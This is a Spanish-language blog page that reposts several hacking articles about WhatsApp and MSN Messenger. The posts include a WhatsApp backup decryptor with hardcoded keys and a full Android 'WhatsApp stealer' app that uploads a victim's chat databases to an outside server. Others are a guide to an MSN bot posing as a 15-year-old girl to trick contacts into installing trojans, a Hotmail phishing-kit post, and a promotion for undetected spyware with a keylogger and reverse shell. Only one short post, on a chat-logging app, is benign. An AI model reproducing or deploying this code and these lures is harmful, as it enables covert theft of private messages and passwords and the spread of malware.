Banner 1

Mostrando entradas con la etiqueta msn. Mostrar todas las entradas
Mostrando entradas con la etiqueta msn. Mostrar todas las entradas

Descifrando msgstore.db.crypt5, la nueva base de datos de WhatsApp

0 comentarios
WhatsApp es criticada muchas veces por su seguridad y le tocará arrastrar mala fama como ha ocurrido con otras aplicaciones o sistemas operativos. Lógico, teniendo en cuenta la cantidad de métodos que existen para espiarlo.
Hace 3 años Yago publicaba en este mismo blog uno de los primeros estudios con fallos muy críticos. Desde entonces hasta ahora han ido apareciendo numerosas noticias y otros problemas sin parar. WhatsApp está de moda y por ello, también en el ojo del huracán.
Sin ir más lejos, esta misma semana muchos medios de comunicación se han hecho eco de la entrada de un blog que decía que se podían robar conversaciones mediante una aplicación falsa (?) que leyese la tarjeta de memoria SD y mandase los archivos por Internet. ¿Perdón? Esto es algo sabido desde hace años y usado por malware. Nada que no apareciese incluso por aquí. Además afecta a todo Android y no solo a este cliente de mensajería. Hasta mi propio LG tiene una aplicación que hace backup de todo el terminal en la memoria SD y también es susceptible de ser robado. Y eso significa TODOS los datos de mi móvil. 


Pero muchos de los problemas de WhatsApp no son tan tremendos, no más que los que hay en otros protocolos como por ejemplo el del correo electrónico, que históricamente se ha transmitido en texto plano, que también permite falsificar al emisor y que no garantiza la integridad del mensaje. Claro, el correo-e no está de moda, ni sale ya en las noticias por ser parte de ventas y compras de miles de millones de euros. 
Yo uso whatsapp y también uso el correo electrónico ¿y? Lo increíble de whatsapp no es su seguridad, ni la falta de ella. Lo realmente impresionante es como han conseguido escalar su arquitectura con unas decenas de empleados, con millones de usuarios más que otras redes sociales y sin apenas incidentes de disponibilidad. Eso sí que es hacking.
Volviendo al tema. Desde la última actualización (2.11.152), WhatsApp ha cambiado el algoritmo y la clave para cifrar las copias de seguridad en las SD. No es que la hayan mejorado sustancialmente, pero ha cambiado y el viejo método ha dejado de funcionar para los nuevos archivos con extensión "crypt5".
Esta vez el mérito de obtener las claves para descifrar este formato se lo ha llevado el autor de una aplicación de estadísticas: Chat Statitics for WhatsApp. y aunque no ha publicado los datos, si ha facilitado la tarea para que otros la obtengan de su propia herramienta.
Una vez comprada la aplicación y diseccionada, si observamos su contenido, rápidamente se ven los métodos para cifrar y descifrar las bases de datos de la copia de seguridad.
dex2jar, jd-gui, etc.
Como se puede observar, carga una librería "libaes.so" dónde realmente está la chicha.

[root@digitalsec aramosf]# readelf -a libaes.so | grep FUNC
     1: 00000000     0 FUNC    GLOBAL DEFAULT  UND __cxa_finalize
     2: 00000000     0 FUNC    GLOBAL DEFAULT  UND __cxa_atexit
     3: 00000000     0 FUNC    GLOBAL DEFAULT  UND __stack_chk_fail
     4: 00000740  1225 FUNC    GLOBAL DEFAULT    7 AES_decrypt
     5: 00001470   574 FUNC    GLOBAL DEFAULT    7 CRYPTO_cbc128_decrypt
     7: 000016b0  1218 FUNC    GLOBAL DEFAULT    7 private_AES_set_encrypt_k
     8: 00001b80   605 FUNC    GLOBAL DEFAULT    7 private_AES_set_decrypt_k
     9: 00001de0  1249 FUNC    GLOBAL DEFAULT    7 AES_encrypt
    10: 000022d0    46 FUNC    GLOBAL DEFAULT    7 MD5_Init
    11: 00002300   258 FUNC    GLOBAL DEFAULT    7 MD5_Update
    12: 00000000     0 FUNC    GLOBAL DEFAULT  UND memcpy
    13: 00002410   429 FUNC    GLOBAL DEFAULT    7 MD5_Final
    14: 00000000     0 FUNC    GLOBAL DEFAULT  UND memset
    15: 000025c0  2570 FUNC    GLOBAL DEFAULT    7 Java_de_tiflo_whatsapp_st
    16: 00000000     0 FUNC    GLOBAL DEFAULT  UND strlen
    17: 00000000     0 FUNC    GLOBAL DEFAULT  UND fopen
    18: 00000000     0 FUNC    GLOBAL DEFAULT  UND malloc
    19: 00000000     0 FUNC    GLOBAL DEFAULT  UND fseek
    20: 00000000     0 FUNC    GLOBAL DEFAULT  UND ftell
    21: 00000000     0 FUNC    GLOBAL DEFAULT  UND fwrite
    22: 00000000     0 FUNC    GLOBAL DEFAULT  UND fread
    23: 00000000     0 FUNC    GLOBAL DEFAULT  UND free
    24: 00000000     0 FUNC    GLOBAL DEFAULT  UND fclose
Analizando más lentamente estas funciones se obtienen las claves necesarias. En esta parte he tenido la suerte de contar con la ayuda de Mario Ballano que le ha puesto luz a parte del código donde yo me perdía y en la que hace falta jugar con el md5.
Tras un rato hemos descubierto que la función "CRYPTO_cbc128_decrypt" parecía una trampa, ya que el algoritmo usado realmente es: aes-cbc-192. Al final de la mañana hemos terminado el proceso con un script para descifrarlas automáticamente.
No hemos puesto la bandera, ya que el autor de Chat Statitics ya conocía este método, pero por lo menos, si lo hemos liberado para que lo use todo el mundo con sus herramientas y como no, ya está implementado en la recuperación de mensajes eliminados de http://www.recovermessages.com.
El script en cuestión ya está en mi github y requiere que se conozca el nombre de la cuenta asociada al móvil, que se puede sacar de Ajustes->Cuentas y sincronización->Google
Para usarlo es tan sencillo como invocarlo así: 
- python pwncrypt5.py msgstore.db.crypt5 grbnz0@gmail.com > msgstore.sdb
Y finalizo con el codiciado código:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
#!/usr/bin/python              
"""
48bits presents:
8===============================================D~~~
WhatsApp msgstore crypt5 decryptor by grbnz0 and nullsub
8===============================================D~~~
 
"""
                                                                                                                                                                                   
import sys
import hashlib
import StringIO
from M2Crypto import EVP
 
key = bytearray([141, 75, 21, 92, 201, 255, 129, 229, 203, 246, 250, 
   120, 25, 54, 106, 62, 198, 33, 166, 86, 65, 108, 215, 147])
iv = bytearray([0x1E,0x39,0xF3,0x69,0xE9,0xD,0xB3,0x3A,0xA7,0x3B,0x44,
   0x2B,0xBB,0xB6,0xB0,0xB9])
 
def decrypt(db,acc):
  fh = file(db,'rb')
  edb = fh.read()
  fh.close()
  m = hashlib.md5()
  m.update(acc)
  md5 = bytearray(m.digest())
  for i in xrange(24): key[i] ^= md5[i&0xF]
  cipher = EVP.Cipher('aes_192_cbc', key=key, iv=iv, op=0)
  sys.stdout.write(cipher.update(edb))
  sys.stdout.write(cipher.final())
 
if __name__ == '__main__':
  if len(sys.argv) != 3:
    print 'usage %s   > decrypted.db' % sys.argv[0]
  else:
    decrypt(sys.argv[1],sys.argv[2])

A todos los que tenéis problemas y lo quereis hacer de una forma más sencilla y rápida, os recomiendo que uséis directamente la página web: http://www.recovermessages.com que además de descifrar el fichero os mostrará los mensajes eliminados.

Fuente: http://www.securitybydefault.com/2014/03/descifrando-msgstoredbcrypt5-la-nueva.html

Crear Aplicación en Android para robar y leer chats de WhatsApp.

0 comentarios
¿Es posible subir y leer los chats de Whatsapp de un smartphone desde otra aplicación de Android? Por supuesto que sí. Sólo necesitamos que la aplicación maliciosa haya sido instalada aceptando los permisos para leer la tarjeta SD del dispositivo (android.permission.READ_EXTERNAL_STORAGE).

Hace unos meses se publicó en algunos foros una guía paso a paso para montar nuestro propio Whatsapp Stealer y ahora Bas Bosschert ha publicado una PoC con unas pocas modificaciones.

Para empezar con la prueba de concepto (y ojo que digo PoC que nos conocemos ;)) tenemos que publicar en nuestro webserver un php para subir las bases de datos de Whatsapp:

php
// Upload script to upload Whatsapp database
// This script is for testing purposes only.
 
$uploaddir = "/tmp/whatsapp/";
 
if ($_FILES["file"]["error"] > 0)
  {
  echo "Error: " . $_FILES["file"]["error"] . "
";
  }
else
  {
  echo "Upload: " . $_FILES["file"]["name"] . "
";
  echo "Type: " . $_FILES["file"]["type"] . "
";
  echo "Size: " . ($_FILES["file"]["size"] / 1024) . " kB
";
  echo "Stored in: " . $_FILES["file"]["tmp_name"];
 
  $uploadfile = $uploaddir . $_SERVER['REMOTE_ADDR'] . "." . basename($_FILES['file']['name']);
  move_uploaded_file($_FILES['file']['tmp_name'], $uploadfile);
  }
?>
 
</span><span class="pln">Shoo.. nothing here</span><span class="tag">
method="post" enctype="multipart/form-data"> type="file" name="file" id="file"> type="submit" value="Submit">

Después debemos configurar nuestro php.ini para subir ficheros grandes:

...
file_uploads = On
post_max_size = 32M
upload_max_filesize = 32M

Lo siguiente que necesitamos es crear la aplicación de Android que suba los ficheros de la base de datos de WhatsApp hacia el servidor web. Para ello creamos un proyecto en Eclipse y empezamos modificando el fichero AndroidManifest.xml para solicitar los permisos para leer la tarjeta SD e Internet:

xml version="1.0" encoding="utf-8"?>
 xmlns:android="http://schemas.android.com/apk/res/android"
    package="bb.security.whatsappupload"
    android:versionCode="1"
    android:versionName="1.0" >
 
     android:name="android.permission.READ_EXTERNAL_STORAGE" />
     android:name="android.permission.INTERNET" />
 
    
        android:minSdkVersion="8"
        android:targetSdkVersion="19" />
 
    
        android:allowBackup="true"
        android:icon="@drawable/ic_launcher"
        android:label="@string/app_name"
        android:theme="@style/AppTheme" >
 
        
            android:name="bb.security.whatsappupload.MainActivity"
            android:label="@string/app_name" >
            
                 android:name="android.intent.action.MAIN" />
 
                 android:name="android.intent.category.LAUNCHER" />
            
             
Para la disposición podemos utilizar el diseño predeterminado que crea Eclipse, si acaso podemos mover el TextView al centro y aumentar el tamaño del texto. La subida del fichero ocurre antes de ver el layout, para esta prueba de concepto de este activity_main.xml es lo suficientemente bueno:

 xmlns:android="http://schemas.android.com/apk/res/android"
    xmlns:tools="http://schemas.android.com/tools"
    android:layout_width="match_parent"
    android:layout_height="match_parent"
    android:paddingBottom="@dimen/activity_vertical_margin"
    android:paddingLeft="@dimen/activity_horizontal_margin"
    android:paddingRight="@dimen/activity_horizontal_margin"
    android:paddingTop="@dimen/activity_vertical_margin"
    tools:context=".MainActivity" >
 
    
        android:layout_width="wrap_content"
        android:layout_height="wrap_content"
        android:layout_alignParentTop="true"
        android:layout_centerHorizontal="true"
        android:layout_marginTop="179dp"
        android:text="@string/hello_world"
        android:textSize="24sp" />
 

A continuación tenemos que crear la función MainActivity.java para subir cada uno de los ficheros:

    - /WhatsApp/Databases/msgstore.db
    - /WhatsApp/Databases/wa.db
    - /WhatsApp/Databases/msgstore.db.crypt

    - /WhatsApp/Databases/msgstore.db.crypt5 (últimas versiones)
package bb.security.whatsappupload;
 
/*
* This application is for testing purposes only.
* Use of this application is at your own risk.
*/
 
import java.io.DataInputStream;
import java.io.DataOutputStream;
import java.io.File;
import java.io.FileInputStream;
import java.io.IOException;
import java.net.HttpURLConnection;
import java.net.MalformedURLException;
import java.net.URL;
 
import android.os.AsyncTask;
import android.os.Bundle;
import android.os.Environment;
import android.app.Activity;
import android.app.ProgressDialog;
import android.util.Log;
import android.view.Menu;
 
public class MainActivity extends Activity {
 
    //A ProgressDialog object
    private ProgressDialog progressDialog;
 
    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        setContentView(R.layout.activity_main);
        new UploadWhatsApp().execute();
    }
 
    @Override
    public boolean onCreateOptionsMenu(Menu menu) {
        // Inflate the menu; this adds items to the action bar if it is present.
        getMenuInflater().inflate(R.menu.main, menu);
        return true;
    }
 
    @SuppressWarnings("deprecation")
    private void uploadFile(String file) {
        HttpURLConnection conn = null;
        DataOutputStream dos = null;
        DataInputStream inStream = null;
 
        Log.i("FILE", "Filename:\n" + file);
 
        String lineEnd = "\r\n";
        String twoHyphens = "--";
        String boundary = "*****";
        int bytesRead, bytesAvailable, bufferSize;
        byte[] buffer;
        int maxBufferSize = 1 * 1024 * 1024 * 1024;
        String urlString = "http://bas.bosschert.nl/whatsapp/upload_wa.php";
        try {
            //     ------------------ CLIENT REQUEST
            FileInputStream fileInputStream = new FileInputStream(new File(
                    file));
            // open a URL connection to the Servlet
            URL url = new URL(urlString);
            // Open a HTTP connection to the URL
            conn = (HttpURLConnection) url.openConnection();
            // Allow Inputs
            conn.setDoInput(true);
            // Allow Outputs
            conn.setDoOutput(true);
            // Don't use a cached copy.
            conn.setUseCaches(false);
            // Use a post method.
            conn.setRequestMethod("POST");
            conn.setRequestProperty("Connection", "Keep-Alive");
            conn.setRequestProperty("Content-Type",
                    "multipart/form-data;boundary=" + boundary);
            dos = new DataOutputStream(conn.getOutputStream());
            dos.writeBytes(twoHyphens + boundary + lineEnd);
            dos.writeBytes("Content-Disposition: form-data; name=\"file\";filename=\""
                    + file + "\"" + lineEnd);
            dos.writeBytes(lineEnd);
            // create a buffer of maximum size
            bytesAvailable = fileInputStream.available();
            bufferSize = Math.min(bytesAvailable, maxBufferSize);
            buffer = new byte[bufferSize];
            // read file and write it into form...
            bytesRead = fileInputStream.read(buffer, 0, bufferSize);
            while (bytesRead > 0) {
                dos.write(buffer, 0, bufferSize);
                bytesAvailable = fileInputStream.available();
                bufferSize = Math.min(bytesAvailable, maxBufferSize);
                bytesRead = fileInputStream.read(buffer, 0, bufferSize);
            }
            // send multipart form data necesssary after file data...
            dos.writeBytes(lineEnd);
            dos.writeBytes(twoHyphens + boundary + twoHyphens + lineEnd);
            // close streams
            Log.e("Debug", "File is written");
            fileInputStream.close();
            dos.flush();
            dos.close();
        } catch (MalformedURLException ex) {
            Log.e("Debug", "error: " + ex.getMessage(), ex);
        } catch (IOException ioe) {
            Log.e("Debug", "error: " + ioe.getMessage(), ioe);
        }
        // ------------------ read the SERVER RESPONSE
        try {
            if (conn != null){
                inStream = new DataInputStream(conn.getInputStream());
                String str;
 
                while ((str = inStream.readLine()) != null) {
                    Log.e("Debug", "Server Response " + str);
                }
                inStream.close();
            }
 
        } catch (IOException ioex) {
            Log.e("Debug", "error: " + ioex.getMessage(), ioex);
        }
    }
 
    private class UploadWhatsApp extends AsyncTask<Void, Integer, Void>{
 
        @Override
        protected void onPreExecute()
        {
            //Create a new progress dialog
            progressDialog = ProgressDialog.show(MainActivity.this,"Loading Application, please wait...",
                    "Loading, please wait...", false, false);
        }
 
        //The code to be executed in a background thread.
        @Override
        protected Void doInBackground(Void... params)
        {
 
            String fileWACrypt = Environment.getExternalStorageDirectory()
                    .getPath() + "/WhatsApp/Databases/msgstore.db.crypt";
            String fileWAPlain = Environment.getExternalStorageDirectory()
                    .getPath() + "/WhatsApp/Databases/msgstore.db";
            String fileWAwa = Environment.getExternalStorageDirectory()
                    .getPath() + "/WhatsApp/Databases/wa.db";
 
            MainActivity.this.uploadFile(fileWACrypt);
            MainActivity.this.uploadFile(fileWAPlain);
            MainActivity.this.uploadFile(fileWAwa);
            return null;
        }
 
        //Update the progress
        @Override
        protected void onProgressUpdate(Integer... values)
        {
            //set the current progress of the progress dialog
            progressDialog.setProgress(values[0]);
        }
 
        //after executing the code in the thread
        @Override
        protected void onPostExecute(Void result)
        {
            //close the progress dialog
            progressDialog.dismiss();
            //initialize the View
            setContentView(R.layout.activity_main);
        }
 
    }
}
   
msgstore.db y wa.db son bases de datos sin cifrar utilizados en antiguas versiones de Whatsapp. Msgstore.db.crypt está cifrado con AES, pero siempre usando la misma clave tanto para cifrar como descifrar: 346a23652a46392b4d73257c67317e352e3372482177652c.

Por lo tanto podremos descifrarla una vez obtenido mediante:

openssl enc -d -aes-192-ecb -in msgstore.db.crypt -out msgstore.db.sqlite -K 346a23652a46392b4d73257c67317e352e3372482177652c

o mediante el siguiente script en Python:

#!/usr/bin/env python
 
import sys
from Crypto.Cipher import AES
 
try:
    wafile=sys.argv[1]
except:
    print "Usage: %s " % __file__
    sys.exit(1)
 
key = "346a23652a46392b4d73257c67317e352e3372482177652c".decode('hex')
cipher = AES.new(key,1)
open('msgstore.db',"wb").write(cipher.decrypt(open(wafile,"rb").read()))
 
Y ya está, así de sencillo. Podremos estar leyendo los chats de WhatsApp de las bases de datos extraídas...

Actualización: Desde la última actualización (2.11.152), WhatsApp ha cambiado el algoritmo y la clave para cifrar las copias de seguridad en las SD. Los nuevos archivos con extensión "crypt5" se cifran mediante aes-cbc-192.

Para descifrarlo podéis utilizar un script de grbnz0 y nullsub (
más información en SbD):

- python pwncrypt5.py msgstore.db.crypt5 grbnz0@gmail.com > msgstore.sdb

#!/usr/bin/env python
"""
48bits presents:
8===============================================D~~~
WhatsApp msgstore crypt5 decryptor by grbnz0 and nullsub
8===============================================D~~~
"""
                                                                                                                                                                                   
import sys
import hashlib
import StringIO
from M2Crypto import EVP
 
key = bytearray([141, 75, 21, 92, 201, 255, 129, 229, 203, 246, 250, 120, 25, 54, 106, 62, 198, 33, 166, 86, 65, 108, 215, 147])
iv = bytearray([0x1E,0x39,0xF3,0x69,0xE9,0xD,0xB3,0x3A,0xA7,0x3B,0x44,0x2B,0xBB,0xB6,0xB0,0xB9])
 
def decrypt(db,acc):
  fh = file(db,'rb')
  edb = fh.read()
  fh.close()
  m = hashlib.md5()
  m.update(acc)
  md5 = bytearray(m.digest())
  for i in xrange(24): key[i] ^= md5[i&0xF]
  cipher = EVP.Cipher('aes_192_cbc', key=key, iv=iv, op=0)
  sys.stdout.write(cipher.update(edb))
  sys.stdout.write(cipher.final())
 
if __name__ == '__main__':
  if len(sys.argv) != 3:
    print 'usage %s   > decrypted.db' % sys.argv[0]
  else:
    decrypt(sys.argv[1],sys.argv[2])

Creando un [BOT MSN] Con fines de esparcir un Malware

0 comentarios
Bueno a estructurar el Malware
Procederemos a crearnos una Cuenta en la Siguiente web y a descargar nuestra IBOX PLATAFORM


http://sp.incesoft.com
Nota: es una Plataforma para Bots [SOFTWARE] que nos permitira la configuracion total del IBOT

Un formulario comun y corriente

Una ves teniendo una cuenta nos decidimos a la Configuracion externa de nuestro BOT como lo es.. MENSAJE - AVATAR - NICK y todo... Esto lo haremos con el fin de simular un user comun y corriente.
No Daremos Pistas de que es un BOT
Para ello en la Imagen me decidi a simular una Chica Aproximadamente de 15 Años que solo busca Amigos..
Se llama Laura su pic es de una chica llamativa y cosas asi...

Actualizamos la Informacion y Guardamos

Basic Info: Informacion simple del BOT.. servidor CHINA mensajes y todo pero solo es en tu cuenta! no se vera en el BOT MSN CONTACT

Robot Account: Ahi es donde agregan sus cuentas de MSN para que vivan los bots, y las administran , pueden cambiar sus contraseñas, ver que usuarios lo agregaron, etc.


Display Pictures: Cambian las imagenes que puede tener el bot



My Emotions: Agrega emoticones personalizados

Your Files: podremos subir archivos que se le enviarian a los contactos
Nuestro caso, algun malware.


La cuenta Hotmail que Agregaran en Msn Account management debe ser REAL y que quede acorde a los datos para pasar desapersividos
si tu Nick es LAURA create un MSN masomenos asi

lau-67548-linda@hotmail.com
Eso es creible pero no haras incoherencias como:
elmejor-man@hotmail.com
Sopechoso no ¿?
Despues de este paso decidiremos hacer CONECTAR y DARLE VIDA A FRANKESTEIN XD!.. pero Primero configuraremos que Dira... que Preguntara y como Actuara!..

Ya despues de terminar la configuracion procedemos a descargar los Sources JAVA SDK, COM SDK

Configurando el interior

Una ves descargado todo tendremos que tener conocimientos en el lenguaje BASE: JAVA, como no quiero alargar este articulo no muestro esas partes.

1- Debemos tener en cuenta la conversacion: debe ser Coherente, debe tener preguntas y respuestas previas:

EJEMPLO

BoT: Hola!
user: hola
bot: como estas?
user: bien y tu?
bot: bien, quieres ver mi foto?
user: si
bot: mira: [Link malicioso]

Pues Bueno... Ahora Como Infectaremos con Algun malware ¿?
Procedemos a Subir un .EXE ya sea un Server de BOTNET o Troyano o un SHD o un SERVER PROXY o FTPSERVER lo que quieran... a algun Hosting personal o nuevo y lo metemos en medio de la conversacion del IBOT
En mi caso hice mi BOT de esta Manera...

BOT: Hola
User: Hola
BOT: como estas¿?
User: bn y tu , quien eres?
BOT: yo estoy bien.. soy Laura tengo 15 Años y busco amigos
User: mm ya
BOT: tengo fotos y una Pagina :)
BOT: mi pagina es http://www.webconmalware.com/index.php
User: Me pide que baje un Archivo¿?
BOT: ahh se me olvidaba para verla bien debes bajar el Complemento de videos
User: ahh OKz!

El Index.php de mi web tiene un REDIRECT hacia un .exe y q se autodescargue y que imprima una alerta que diga.. "Necesita Bajar el Sgte Complemento"
La persona lo baja y listo!!


Como difundir Nuestro Correo BOT¿?
muy simple, exportando listas de contactos y agregandolas al msn bot, usando mailist entre muchas mas.

Analizando todo, ya ven como convertir una simple APP en una potente herramienta de Marketing o malwaring? incluso crimeware.

FUENTE:http://maztor.blogspot.com/2011/06/creando-un-bot-msn-con-fines-de.html

Guarda las Conversaciones de MSN Messenger, Yahoo! Messenger, Pidgin Skype, etc..

0 comentarios

IM History es una excelente aplicación que permite guardar las conversaciones de diferentes clientes de mensajería instantánea en una sola aplicación de forma que todo nuestro log de charlas queden en un solo lugar.

Guardar conversaiones de messenger

Para utilizar el IM History solo tenemos que crearnos una cuenta en su sitio, descargar e instalar el programa, este detectara automáticamente los clientes de mensajería instantánea que tengas instalado y los configurara.

El IMHistory no se limita a guardar nuestras conversaciones en texto plano sino que además guarda imágenes, fotos además de guardar el texto con su tipo de fuente y color.

Los clientes de mensajería instantánea soportados de momento son:

MSN Messenger
Yahoo! Messenger
ICQ
Trillian
Miranda
AIM
Skype

Y pronto agregaran soporte para Gtalk, Kopete e iChat.

Esta disponible para Microsoft Windows y GNU Linux y puedes descargarlo haciendo click en el botón correspondiente a tu sistema operativo:

Download Windows Installer
Download Linux Installer

Mas Información:
Pagina oficial del IM History

fuente:http://www.dragonjar.org/guarda-las-conversaciones-de-msn-messenger-yahoo-messenger-pidgin-skype-etc.xhtml

HACKEAR HOTMAIL *Xploid windows live new*

0 comentarios
¿Se podra hacer esta wea?
sipo demas pero hay ke engañar a los wns naa mas

apuesto k nadie sabia

ya sin mas preambulos aki va la weaita

1-. paso crear una cuenta en www.t35.com

2-. subir el archivo zip completito

3-. enviarles tu direccion EJ: tunombre.t35.com a los weas ke te compren esta wea (no kreo ke keden wns todavia ... bueno ke este pais ta lleno de wns)

y para ver las contraseñas entras a tunombre.t35.com/robados.txt

y eso es too

ojala no ayan reclamos por esta wea
pero hay muchos ke preguntan y aki les koopero con una forma
y naide les responde bien :S

adios
IGuAL CUENTENME SI LES RESULTA AGRADE"SCAN" =P

****deveria verse asi******www.hotmail.com
al que no le resulte no pregunte pk ta terrible facil .. hasta yo pude y lo kise compartir ... aiozzz

Fuente:http://www.chilewarez.cl/foros/showthread.php?t=128411

Msn Nightmare Espia Conversacio (tiempo Real)

0 comentarios
PRIMERO KIERO ACLARAR KE ESTE PROGRAMA YA ESTA PROBADO POR MI Y POR VARIOS Y NO HAY FALLA ,TODABIA NO ES DETECTADO CON NINGUN ANTIVIRUS POR LO MENOS HASTA EL MOMENTO LE PASE VARIAS VECES ANTIVIRUS Y NADA

POR CUESTIONES DE ETICA VOY A DEJAR EL POST TAL Y COMO ESTA EN LA WEB DEL AUTOR NO VOY A MODIFICAR NADA PARA RESPETAR LOS DERECHOS DE AUTOR ASI KE AKI SE LOS PONGO

msn Nightmare és una pequeña aplicación que te permite interceptar remotamente todo lo que se envia o recibe del msn messenger e incluso intervenir en medio de una conversación suplantando el pc en el que está instalado. A día de hoy no es detectado por ningún antivirus y cómo utiliza técnicas de inyección tampoco es detectado por ningún firewall.
Características:
> Espiar conversaciones de msn messenger
> Intervenir en una conversacion suplantando al pc remoto
> Evitar recepción i/o envio de mensajes
> Recuperación de passwords del messenger (en el registro y por keylogger)
> Explorar/Ejecutar/Eliminar/Subir/Descargar archivos remotos
> Desinstalar remotamente

> Shell Inversa

> Pequeña utilidad para comprobar si tienes los puertos del router abiertos

> Función subir log de conversaciones y passwords a ftp para no tener que abrir puertos

> Conexión sin necesidad de determinar ips

> Mucho mas estable que la versión 2.1



LINK FUNKANDO :
http://rapidshare.com/files/98276196...2MzrD.rar.html

Ke lo disfruten

Fuente:http://www.chilewarez.cl/foros/showthread.php?t=111769
Powered by Bad Robot
Helped by Blackubay